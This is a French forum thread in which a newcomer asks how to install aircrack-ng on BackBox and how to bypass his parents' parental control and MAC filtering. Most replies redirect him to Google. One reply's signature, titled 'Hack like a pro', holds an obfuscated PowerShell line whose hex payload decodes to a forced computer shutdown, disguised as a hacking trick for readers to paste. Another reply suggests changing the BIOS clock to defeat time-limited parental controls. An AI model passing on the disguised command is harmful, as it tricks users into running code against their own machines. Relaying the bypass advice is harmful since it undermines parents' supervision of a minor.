Annonce

Réduire
Aucune annonce.

probleme astuce

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • probleme astuce

    Bonjour a tous je suis nouveaux sur se site la ^^ voila jai un soucis comment fais on pour installer aircrack ng sur backbox sa me met dans le terminal ...

    voila un autre point comment je peut faire pour detourner le controle parentale de me parent car il me coupe la wifi jai esayer de changer l'adrresse mac mes mon pere a aactiver le filtrage mac merci de vos reponse

  • #2
    backbox est basé sur Debian - Ubuntu, il suffit de faire une recherche sur aircrack-ng ubuntu installation via google par exemple, et tu trouveras sans doute la manière de faire.

    Commentaire


    • #3
      il faut donc intaller par google mes alors pourquoi quand je clique sur aircrack ng sur "auditing" sa me ouvre le terminale avec sa


      Wireless WEP/WPA cracking utilities

      airbase-ng airdecloak-ng airodump-ng airtun-ng ivstools packetforge-ng
      aircrack-ng aireplay-ng airolib-ng buddy-ng kstats tkiptun-ng
      airdecap-ng airmon-ng airserv-ng easside-ng makeivs-ng wesside-ng

      SA mes sa dans le terminal

      Commentaire


      • #4
        Envoyé par fleors Voir le message
        il faut donc intaller par google
        Quand ça commence comme ça c'est mal parti... Je te dis juste d'utiliser google pour faire tes recherches concernant ton problème. C'est en cherchant qu'on progresse, il faut donc faire tes propres recherches.

        À partir de ton terminal et des recherches que tu auras faîtes, tu pourras taper les commandes essentielles à l'installation d'aircrack-ng.

        Commentaire


        • #5
          et ben justement jai poster sur ce forum car je nest pas trouver la solution a mon probleme je cherche des reponse a ma question sa fais 2 emain que je cherche jai pa trouver je vien de trouver se forum pour pouvoir m'aider dans ma recherche .... sinon je posterais pas se post ...

          Commentaire


          • #6
            Avec ces simples mots clés "install aircrack ng ubuntu" sur Google, la première proposition est : https://doc.ubuntu-fr.org/aircrack-ng

            C'est la dernière fois que je fais une recherche, je ne suis pas un moteur de recherche, je t'invite à lire notre Charte...

            II. Effectuez une recherche avant de poster, et sachez poster correctement :

            Nous disposons d'une rigoureuse searchbar. Assurez-vous de bien avoir lu l'intégralité des discussions en rapport avec votre question pour éviter tout double post et vérifiez par vous-mêmes que vous ne pouvez obtenir votre réponse par une simple recherche Google. Les membres de la communauté sont là pour vous aider - pas pour vous assister. De plus, sachez poster correctement. Posez une question claire, précise et réfléchie afin que les autres membres puissent (avoir envie de) vous répondre. De plus, nous disposons d'un système de préfixe lié à votre post ; sachez l'utiliser à bon escient afin de vous offrir la meilleure visibilité qui soit. Enfin, il va de soi que vous vous devez de bien réfléchir à l'endroit où vous postez.
            Merci par avance,

            Commentaire


            • #7
              @fleors: Tu veux pas qu'on fasse tes devoirs non plus ?
              Hack like a pro :
              PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

              Commentaire


              • #8
                Envoyé par fleors Voir le message
                voila un autre point comment je peut faire pour detourner le controle parentale de me parent car il me coupe la wifi jai esayer de changer l'adrresse mac mes mon pere a aactiver le filtrage mac
                c'est un contrôle parental ou il coupe la connexion wifi ? car ce n'est pas pareil.

                Pour le contrôle parental, c'est simple, tu change l'heure du BIOS si tu as des plages d'heures autorisées.
                WITHOUT DEVIATION FROM THE NORM, PROGRESS IS NOT POSSIBLE
                -Frank Zappa

                Commentaire

                Chargement...
                X